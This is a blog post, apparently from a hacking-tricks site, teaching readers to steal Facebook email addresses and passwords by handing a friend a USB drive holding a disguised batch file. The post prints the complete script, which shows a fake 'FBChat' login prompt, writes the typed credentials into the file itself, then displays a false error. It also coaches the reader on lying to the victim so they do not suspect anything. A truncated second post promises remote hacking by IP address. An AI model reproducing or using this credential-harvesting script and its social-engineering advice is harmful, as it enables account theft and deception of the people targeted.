Facebook phishing using a USB
drive
Here is a simple trick to get the
Email and password of a person via
a USB drive with some social
engineering.
Step 1 : Open Notepad ( Start > All Programs > Accessories ).
Step 2 : Paste the following code and leave a blank line after the code :
TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO
ECHO Please Enter Your Email :
SET/P "MAIL=>"
ECHO.
ECHO Enter The Password :
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.
bat
ECHO PASSWORD = %PSWD%
>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while connecting to the server. Try again later.
PAUSE>NUL
EXIT
-------- Below this line are the collected information --------
Step 3 : Save the code as FBChat.bat exactly. Do not name it anything else or it won't work.
Step 4 : Put the batch file into a USB drive and give it to your friend.
When you get back the USB drive,right click the batch file and select Edit. Now scroll down and you will see the information collected! With some social engineering the trick can be very efficient. Before trying this trick out you can tell the victim you are making a cool software and it will be finished soon. Than give the batch file telling him that is the software you made. Try to be convincing and do not let him/her smell a rat! I have tried this trick on some of my friends with 100 percent success. Give it a try yourself!
HOW TO HACK REMOTE COMPUTER USING IP ADDRESS? Note: we are not responsible what you are going to do with this trick FIRSTLY WE WILL TELL YOU WHAT IS INTERNET PROTOCOL (IP) The Internet Protocol is the principal communications protocol used for relaying datagram (packets) across an internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet. IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house...
Comments
Post a Comment
We are thankful for your precious comment.
- Trick 2 Crack team